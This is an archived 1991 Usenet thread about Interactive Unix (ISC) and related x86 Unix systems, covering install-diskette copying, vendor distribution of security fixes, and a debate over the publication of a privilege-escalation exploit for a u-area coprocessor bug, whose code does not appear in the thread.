chris@alderan.uucp (Christoph Splittgerber) writes:
>In article <1061@wa4mei.UUCP> rsj@wa4mei.UUCP (Randy Jarrett) writes:
>
>>Yes it would be nice if they did that but until they do I write protect the
>>install diskette as soon as i receive it and make a copy (3 or 4) with dd to
>>do the install with. They have improved their install methods with each
>
>The problem here is, if you first install the system you don't have dd(1M)
>running to do the backup and the MESS-DOS diskcopy does not work with the
>ISC-boot disk :-(

Yes it does, you just need to make sure you're using MS-DOS 3.30 or later.

     // JCA

 /*
 **--------------------------------------------------------------------------*
 ** Flames  : /dev/null                     | What to buy?
 ** ARPANET : crash!pnet01!jca@nosc.mil     | EISA or MCA?
 ** INTERNET: jca@pnet01.cts.com            | When will the bus wars end?
 ** UUCP    : {nosc ucsd hplabs!hp-sdd}!crash!pnet01!jca
 **--------------------------------------------------------------------------*
 */

marz@cbnewsb.cb.att.com (martin.zam) (03/01/91)

>Sender: Marty Stewart
>Reply-To: martys@ism.isc.com
>Organization: Interactive Systems Corp., Santa Monica, CA
>Lines: 22
>
>
>	This is mail to address the suggestions that INTERACTIVE either post
>the security hole fix to the net or put it on a ftp site where it can be
>picked up by users.
>
>	Under the AT&T licensing agreement, INTERACTIVE cannot post AT&T
>code to a site where any user can pick it up.  We are under the obligation
>to make sure only AT&T licensed users receive binaries that have portions of
>AT&T code in them.  The fixes for the security hole are in os.o and as such,
>the code cannot be put in a public area.  Another reason for not posting to
>the net is that the os.o is quite large and will take up unnecessary band-
>width at sites that do not need the INTERACTIVE fix.
>
>	As an alternative to calling support, please send mail to
>martys@ism.isc.com and I will see to it that users are sent a fix as soon as
>support is given the fix.  I will need an address, the version of software
>that you are running and your 2.0.2 or 2.2 serial number.  INTERACTIVE
>apologizes for any inconveniences this may cause users.
>
>Marty C. Stewart
>Support Team Leader
>INTERACTIVE Systems Corp.
>
>
Why don't you post a list of bugs that you do have a fix for?!?! 
My luck has been about the same as everybody else's at getting things
fixed, but I would like to have a FULLY FUNCTIONAL system without
having to weed out and isolate every damn bug in this system myself.

I am no happier than the rest of the netters who have complained, I just
haven't been as vocal.  

In addition, any docs that have been updated for my release of ISC should
be made available as well.  I paid handsomely for my complete ISC license
and I think support should reflect the price I paid.  Nothing installed
and just worked!  Nothing!  Anybody out there get their mouse to work
properly with X windows without pain?  Everything was painful, and calling
for tech support is downright degrading.

Anybody got Kodak's address?

						My Opinions,
						Martin Zam
						(201)564-2554

allbery@NCoast.ORG (Brandon S. Allbery KB8JRR) (03/03/91)

As quoted from <348@alderan.uucp> by chris@alderan.uucp (Christoph Splittgerber):
+---------------
| In article <1061@wa4mei.UUCP> rsj@wa4mei.UUCP (Randy Jarrett) writes:
| >Yes it would be nice if they did that but until they do I write protect the
| >install diskette as soon as i receive it and make a copy (3 or 4) with dd to
| >do the install with. They have improved their install methods with each
| 
| The problem here is, if you first install the system you don't have dd(1M)
| running to do the backup and the MESS-DOS diskcopy does not work with the
| ISC-boot disk :-(
+---------------

You can always boot up under Minix and dd it there...  :-)

++Brandon
-- 
Me: Brandon S. Allbery			    VHF/UHF: KB8JRR on 220, 2m, 440
Internet: allbery@NCoast.ORG		    Packet: KB8JRR @ WA8BXN
America OnLine: KB8JRR			    AMPR: KB8JRR.AmPR.ORG [44.70.4.88]
uunet!usenet.ins.cwru.edu!ncoast!allbery    Delphi: ALLBERY

vickde@vicstoy.UUCP (Vick De Giorgio) (03/03/91)

In article <1071@wa4mei.UUCP> rsj@wa4mei.UUCP (Randy Jarrett) writes:
>
>If you can find a copy of PC-DOS ver 3.1 you can us it to make copies.
>The diskcopy from it works.  Aparently changes made since then prevent
>duplicating non-dos diskettes.

PC-DOS 3.3 works fine with 1.2's, I used it to backup mine before
I installed. I've heard that it doesn't work 3-1/2's, but haven't
checked it out. =V=
-- 
Vick De Giorgio - vickde@vicstoy.UUCP -- I'd fly 10,000 miles to smoke a camel.
           UUCP - uunet!tarpit!bilver!vicstoy!vickde
                - The Philosopher's Stone Unix BBS, Orlando FL
                - (407) 299-3661   1200/2400   24 hours   8N1

davidsen@sixhub.UUCP (Wm E. Davidsen Jr) (03/04/91)

In article <1991Feb28.223835.4114@cbfsb.att.com> marz@cbnewsb.cb.att.com (martin.zam) writes:

| Why don't you post a list of bugs that you do have a fix for?!?! 

  I wish a few more vendors would learn from SCO and just make every
damn fix for every o/s available in one list. Users don't seem to be too
dumb to figure it out.

  At least SCO users.
-- 
bill davidsen - davidsen@sixhub.uucp (uunet!crdgw1!sixhub!davidsen)
    sysop *IX BBS and Public Access UNIX
    moderator of comp.binaries.ibm.pc and 80386 mailing list
"Stupidity, like virtue, is its own reward" -me

tmh@prosun.first.gmd.de (Thomas Hoberg) (03/06/91)

In article <SR4N5Z@dobag.in-berlin.de>, lumpi@dobag.in-berlin.de (Joern Lubkoll) writes:
|> john@jwt.UUCP (John Temples) writes:
|> >In article <KR3NBQQ@dobag.in-berlin.de> lumpi@dobag.in-berlin.de (Joern Lubkoll) writes:
|> >>it seems that your very cute interactive unix System has a nice bug !
|> >Yikes.  This also works on ESIX-D without a coprocessor, and on ISC 2.0.2
|> >*with* a coprocessor.  It failed on Microport 2.2 with a coprocessor.
|> 
|> It even works on 2.2 with a coprocessor ! You have to set the Kernel
|> Tuneable Parameters UAREAUS and UAREARW to 0 to protect you u-block !
|> If Esix dows have such parameters, please try them and report me the
|> experiences.
|> 2.02 is unprotectable ! a 2.2 System without a co-cpu is also unprotect-
|> able !
|> 
|> >Now, the question is, what do we do to protect ourselves in the meantime?
|> That is the problem which made me think half a year before posting it !
|> The time until the bug-fix arrives will be short I hope, or Interactive
|> has a problem !
|> 
|> jl
|> 
|> -- 
|> lumpi@dobag.in-berlin.de  --  "Nothing is the complete absence of everything."

-- 
Thanks God I got a 486 (and *TWO* coprocessors (387 and 4167).
'toete.c' does nice core dumps now...

Any more bugs like this? Does the emulator need access to the 387 save region
in the u_area? Why is this in there?
8-() tom
----
Thomas M. Hoberg   | UUCP: tmh@bigfoot.first.gmd.de  or  tmh%gmdtub@tub.UUCP
c/o GMD Berlin     |       ...!unido!tub!gmdtub!tmh (Europe) or
D-1000 Berlin 12   |       ...!unido!tub!tmh
Hardenbergplatz 2  |       ...!pyramid!tub!tmh (World)
Germany            | BITNET: tmh%DB0TUI6.BITNET@DB0TUI11 or
+49-30-254 99 160  |         tmh@tub.BITNET

tmh@prosun.first.gmd.de (Thomas Hoberg) (03/06/91)

In article <1991Feb15.134715.16979@virtech.uucp>, cpcahil@virtech.uucp (Conor P. Cahill) writes:
|> mburg@unix386.Convergent.COM (Mike Burg) writes:
|> >
|> >From a view of a person who has work for various Unix system houses -
|> >you can't really blame ISC, ESIX, or any other vendors that current has the
|> >bug in it's release. I think the blame should be placed on AT&T. They are the
|> >ones who are (were) shipping the base source with the bug. Most AT&T UNIX
|> 
|> I agree that AT&T should take a major portion of the blame for this bug,
|> especially in early releases of the OS.  HOWEVER, ISC plainly knew about
|> the but when it released 2.2 and instead of fixing the problem they threw
|> together a kludge that would only work if you had a numeric co-processor 
|> installed in the machine.
|> 
|> That was what I consider a very big *mistake* on ISC's part (I would hazard 
|> a *GUESS* that it was probably a consious decision that the time that would 
|> be spent to fix the problem that was relatively unknown could be better 
|> spent fixing other problems.  Note that I would strongly disagree with this
|> decision).
|> 
|> That said, ISC (and reportedly ESIX) have reacted quickly and promissed a fix
|> disk for each version of the OS RSN.  ESIX has reportedly said it will post
|> the fix to this newsgroup.  ISC *should* do the same, but has said that they
|> will only release the fix via thier normal fixdisk distribution mechanism.
|> 
|> Now, as to the original posting about the bug -
|> 
|> 	1. From what you said (you tried to get ISC to fix it for the past
|> 	   6 months) I agree with your action of posting about the problem 
|> 	   to the net so that you could force ISC to fix the problem.  This
|> 	   was apparently needed.
|> 
|> 	2. I wholeheartly DISAGREE with you posting the source code which
|> 	   performs the security bypass.  You could have just posted the
|> 	   uuencoded binary which would have been enough to prove your point
|> 	   without making it extremely easy for any two bit user to obtain
|> 	   privileged access.  Yes a dedicated hacker could have decoded
|> 	   your explanation and/or the binary and figure out how to replicate
|> 	   your code, but the number of those is MUCH less than the number
|> 	   of people who can now violate the security of the system using
|> 	   your posted code.
|> 
|> 	   POSTING THE CODE WAS DEAD WRONG. 
|>
Hmm, I don't run *ANY* binaries, that come off the net, especially any that are
supposed to exercise security holes. While source code distribution doesn't
make viruses or trojans impossible, I tend to think it makes them harder to hide.
|> Enough said.
ditto
|> -- 
|> Conor P. Cahill            (703)430-9247        Virtual Technologies, Inc.
|> uunet!virtech!cpcahil                           46030 Manekin Plaza, Suite 160
|>                                                 Sterling, VA 22170 

-- 
----
Thomas M. Hoberg   | UUCP: tmh@bigfoot.first.gmd.de  or  tmh%gmdtub@tub.UUCP
c/o GMD Berlin     |       ...!unido!tub!gmdtub!tmh (Europe) or
D-1000 Berlin 12   |       ...!unido!tub!tmh
Hardenbergplatz 2  |       ...!pyramid!tub!tmh (World)
Germany            | BITNET: tmh%DB0TUI6.BITNET@DB0TUI11 or
+49-30-254 99 160  |         tmh@tub.BITNET